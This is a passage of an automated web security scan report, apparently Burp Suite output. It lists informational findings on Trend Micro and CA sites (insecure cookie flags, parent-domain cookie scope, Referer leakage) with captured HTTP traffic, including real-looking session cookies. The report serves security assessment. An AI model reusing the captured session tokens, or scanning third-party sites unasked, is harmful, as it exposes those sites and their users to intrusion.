Location: http://www.viddler.com/bigPlayerChooser.action?ref=&key=dca1712&offsetTime=0
Vary: Accept-Encoding
Content-Length: 340

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.viddler.com/bigPlayerChooser.action?ref=&amp;key=dca1712&amp;offsetTime=0">here</a>.</p>
<hr>
<address>Apache/2.2.16 Server at www.viddler.com Port 80</address>
</body></html>

10. SSL cookie without secure flag set  previous  next
There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


10.1. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js HTTP/1.1
Host: store.trendmicro.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage
Cookie: __qca=P0-1207819931-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 02 Jun 2016 03:00:48 GMT
ETag: "80d-4891f577"
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Jul 2008 17:25:11 GMT
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=2440;ecid=105660496814,0)
Content-Length: 2061
Date: Thu, 02 Jun 2011 21:00:48 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app93
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000; path=/

var ptomodule={A:{},C:{},D:document,L:document.location,M:[],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA:
{"type":"text/javascript"},I:function(){var s=this.L.search;var c=this.D.cooki
...[SNIP]...

10.2. https://www.ca.com/siteminderagent/forms/login.fcc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /siteminderagent/forms/login.fcc

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /siteminderagent/forms/login.fcc HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141
Content-Length: 3488
Cache-Control: max-age=0
Origin: https://www.ca.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODc0ODU5MzQ3D2QWAgIBEGRkFghmD2QWDgIJDxYEHgRocmVmBSJodHRwOi8vd3d3LmNhLmNvbS91cy9wcm9kdWN0cy5hc3B4Hglpbm5lcmh0bWwFCHByb2R1Y3RzZAIKDxYEHwAFLmh0dHA6Ly
...[SNIP]...

Response

HTTP/1.1 302 Object Moved
Cache-control: no-store
Location: /register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d
Content-Length: 0
set-cookie: target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com
set-cookie: SMTRYNO=1; path=/; domain=.ca.com


10.3. https://www.ca.com/us/register/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...

11. Cookie scoped to parent domain  previous  next
There are 2 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


11.1. https://www.ca.com/siteminderagent/forms/login.fcc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /siteminderagent/forms/login.fcc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /siteminderagent/forms/login.fcc HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141
Content-Length: 3488
Cache-Control: max-age=0
Origin: https://www.ca.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODc0ODU5MzQ3D2QWAgIBEGRkFghmD2QWDgIJDxYEHgRocmVmBSJodHRwOi8vd3d3LmNhLmNvbS91cy9wcm9kdWN0cy5hc3B4Hglpbm5lcmh0bWwFCHByb2R1Y3RzZAIKDxYEHwAFLmh0dHA6Ly
...[SNIP]...

Response

HTTP/1.1 302 Object Moved
Cache-control: no-store
Location: /register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d
Content-Length: 0
set-cookie: target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com
set-cookie: SMTRYNO=1; path=/; domain=.ca.com


11.2. https://www.ca.com/us/register/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...

12. Cross-domain Referer leakage  previous  next
There are 12 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


12.1. http://blog.trendmicro.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?p=12640 HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://us.trendmicro.com/us/search/?q=xss&search.x=2&search.y=10&search=search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Link: <http://blog.trendmicro.com/12640>; rel=shortlink
Link: <http://blog.trendmicro.com/?p=12640>; rel=shortlink
X-Varnish: 1696291508
Content-Length: 55144
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:16:26 GMT
Date: Tue, 06 Sep 2011 18:16:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
<map name="Map">
<area shape="rect" coords="22,14,57,48" href="http://www.facebook.com/Trendmicro" target="_blank" alt="Trend Micro Facebook">
<area shape="rect" coords="62,15,99,47" href="http://www.twitter.com/TrendLabs " target="_blank" alt="TrendLabs Twitter">
<area shape="rect" coords="101,15,134,49" href="http://feeds.trendmicro.com/Anti-MalwareBlog/" target="_blank" alt="Malware Blog RSS Feed">
<area shape="rect" coords="142,14,180,49" href="http://www.youtube.com/trendmicroinc" target="_blank" alt="You Tube - Trend Micro">
</map>
...[SNIP]...
</div>
        <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"

type="text/javascript">


</script>
...[SNIP]...
<div style="width:83px;padding-top:4px;"><iframe src="http://www.facebook.com/plugins/like.php?locale=en_US&href=http://blog.trendmicro.com/xss-methods-also-seen-being-used-in-mass-compromises/&amp;layout=button_count&amp;show-faces=false&amp;width=83px&amp;action=like&amp;colorscheme=light" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:83px; height:21px;" allowtransparency="true"></iframe>
...[SNIP]...
<div style="padding-top:3px; width:108px;"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://blog.trendmicro.com/xss-methods-also-seen-being-used-in-mass-compromises/" data-text="XSS Methods Also Seen Being Used in Mass Compromises" data-count="horizontal">Tweet</a>
        <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>&nbsp;&nbsp; <a title="Technorati" rel="nofollow" href="http://technorati.com/faves?add=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"><img title="Technorati" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/technorati.png" alt="Technorati" border="0" /></a>&nbsp;&nbsp; <a title="NewsVine" rel="nofollow" target="_blank" href="http://www.newsvine.com/_tools/seed&amp;save?u=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" ><img src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/newsvine.png" title="NewsVine" alt="NewsVine" border="0" /></a>&nbsp;&nbsp; <a title="MySpace" rel="nofollow" href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"><img title="MySpace" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/myspace.png" alt="MySpace" border="0" /></a>&nbsp;&nbsp; <a title="Google" rel="nofollow" href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"><img title="Google" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/googlebookmark.png" alt="Google" border="0" />
...[SNIP]...
</a>&nbsp;&nbsp; <a title="del.icio.us" rel="nofollow" href="http://del.icio.us/post?url=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"><img title="del.icio.us" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/delicious.png" alt="del.icio.us" border="0" /></a>&nbsp;&nbsp; <a title="StumbleUpon" rel="nofollow" href="http://www.stumbleupon.com/submit?url=http://blog.trendmicro.com/android-malware-targets-china-mobile-subscribers/" target="_blank"><img title="StumbleUpon" src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/images/icons/stumbleupon.png" alt="StumbleUpon" border="0" />
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div class="blogs" align="left"><a href="http://countermeasures.trendmicro.eu/" target="_blank">CounterMeasures Blog </a>
...[SNIP]...
<div class="blogs" align="left"><a href="http://www.simplysecurity.com/" target="_blank">Simply Security News</a>
...[SNIP]...
<div class="blogs" align="left"><a href="http://blog.trendmicro.de/#" target="_blank">Trend Micro Blog [German]</a>
...[SNIP]...
<td width="148" height="195" align="right" valign="bottom"><a href="http://free.antivirus.com/" target="_blank"><img src="http://blog.trendmicro.com/wp-content/themes/TM_2010theme/blogimages2010/freetools.jpg" alt="Trend Micro Free Tools" width="140" height="192" border="0">
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-88yo-3lmt3UHI.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
</script>
<script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

12.2. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /wp-content/plugins/flash-gallery/js/addOnLoad.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /wp-content/plugins/flash-gallery/js/addOnLoad.js?ver=1 HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/?p=12640
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; 